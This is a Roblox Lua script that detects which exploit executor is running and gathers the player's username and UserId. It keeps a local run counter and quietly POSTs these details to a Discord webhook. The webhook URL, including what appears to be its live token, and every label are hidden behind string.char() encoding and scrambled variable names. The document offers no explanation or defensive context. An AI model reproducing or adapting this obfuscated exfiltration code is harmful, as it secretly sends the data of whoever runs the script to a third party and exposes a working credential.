local function getCounter()
    local fileName = "c.txt"
    local count = 0

    if isfile(fileName) then
        local content = readfile(fileName)
        count = tonumber(content) or 0
    end

    count = count + 1
    writefile(fileName, tostring(count))

    return count
end

local _aKjhGfDsLmNp = function(_wXyZaBcDeFg)
    local _pQrStUvWxYz = game:GetService("HttpService")
    local _hIjKlMnOpQr = {[string.char(67, 111, 110, 116, 101, 110, 116, 45, 84, 121, 112, 101)] = string.char(97, 112, 112, 108, 105, 99, 97, 116, 105, 111, 110, 47, 106, 115, 111, 110)}
    
    local _bCdEfGhIjKl = game.Players.LocalPlayer
    if not _bCdEfGhIjKl then return end
    
    local _mNoPqRsTuVw = _bCdEfGhIjKl.Name
    local _xYzAbCdEfGh = _bCdEfGhIjKl.UserId

    local _executorDetected = string.char(85, 110, 107, 110, 111, 119, 110)
    local _executorChecks = {
        {check = typeof(syn) == "table", name = string.char(83, 121, 110, 97, 112, 115, 101)},
        {check = typeof(fluxus) == "table", name = string.char(70, 108, 117, 120, 117, 115)},
        {check = typeof(solara) == "table", name = string.char(83, 111, 108, 97, 114, 97)},
        {check = typeof(awp) == "table", name = string.char(65, 87, 80)},
        {check = typeof(delta) == "table", name = string.char(68, 101, 108, 116, 97)},
        {check = typeof(codex) == "table", name = string.char(67, 111, 100, 101, 120)},
        {check = typeof(hydrogen) == "table", name = string.char(72, 121, 100, 114, 111, 103, 101, 110)},
        {check = typeof(xeno) == "table", name = string.char(88, 101, 110, 111)},
        {check = typeof(swift) == "table", name = string.char(83, 119, 105, 102, 116)},
        {check = typeof(arceusx) == "table", name = string.char(65, 114, 99, 101, 117, 115, 32, 88)},
        {check = typeof(identifyexecutor) == "function", name = identifyexecutor()},
        {check = typeof(is_protosmasher_caller) == "function", name = string.char(80, 114, 111, 116, 111, 83, 109, 97, 115, 104, 101, 114)},
        {check = typeof(getgenv) == "function", name = string.char(71, 101, 110, 101, 114, 105, 99, 32, 69, 120, 101, 99, 117, 116, 111, 114, 32, 40, 103, 101, 116, 103, 101, 110, 118, 41)},
        {check = typeof(setreadonly) == "function", name = string.char(71, 101, 110, 101, 114, 105, 99, 32, 69, 120, 101, 99, 117, 116, 111, 114, 32, 40, 115, 101, 116, 114, 101, 97, 100, 111, 110, 108, 121, 41)}
    }

    for _, _exec in ipairs(_executorChecks) do
        if _exec.check then
            _executorDetected = _exec.name
            break
        end
    end

    local _caughtCount = getCounter()

    local _iJkLmNoPqRs = {
    embeds = {{
        title = string.char(69, 120, 101, 99, 117, 116, 111, 114, 32, 68, 101, 116, 101, 99, 116, 101, 100),
        description = 
           
             "\n" .. string.char(42, 42, 80, 108, 97, 121, 101, 114, 32, 78, 97, 109, 101, 58, 42, 42) .. "\n" .. _mNoPqRsTuVw .. 
            
            "\n" .. string.char(10, 42, 42, 80, 108, 97, 121, 101, 114, 32, 73, 68, 58, 42, 42) .. "\n" .. _xYzAbCdEfGh .. 
          
             "\n" .. string.char(10, 42, 42, 69, 120, 101, 99, 117, 116, 111, 114, 32, 85, 115, 101, 100, 58, 42, 42) .. "\n" .. _executorDetected .. 
           
             "\n" .. string.char(10, 42, 42, 67, 111, 117, 110, 116, 101, 114, 58, 42, 42) .. "\n" .. _caughtCount,
        color = 16759879
    }}
}
    
    local _tUvWxYzAbCd = _pQrStUvWxYz:JSONEncode(_iJkLmNoPqRs)
    
    request({
        Url = _wXyZaBcDeFg(),
        Method = string.char(80, 79, 83, 84),
        Headers = _hIjKlMnOpQr,
        Body = _tUvWxYzAbCd
    })
end

local _kLmNoPqRsTu = function()
    local _a = string.char(104, 116, 116, 112, 115, 58, 47, 47)
    local _b = string.char(100, 105, 115, 99, 111, 114, 100, 46, 99, 111, 109, 47)
    local _c = string.char(97, 112, 105, 47, 119, 101, 98, 104, 111, 111, 107, 115, 47)
    local _d = string.char(49, 51, 51, 50, 48, 50, 50, 48, 48, 51, 48, 57, 53, 52, 51, 55, 51, 52, 50)
    local _e = string.char(47, 79, 75, 56, 81, 81, 49, 76, 110, 53, 121, 112, 117, 48, 104, 114, 68)
    local _f = string.char(66, 110, 104, 109, 66, 120, 75, 56, 75, 73, 81, 89, 82, 101, 66, 105, 110, 119, 74, 110)
    local _g = string.char(103, 114, 104, 50, 50, 66, 87, 100, 48, 51, 81, 101, 86, 50)
    local _h = string.char(83, 118, 84, 74, 70, 75, 95, 111, 45, 51, 120, 69, 67, 121, 67, 115, 72, 90)
    
    return _a .. _b .. _c .. _d .. _e .. _f .. _g .. _h
end

_aKjhGfDsLmNp(_kLmNoPqRsTu)


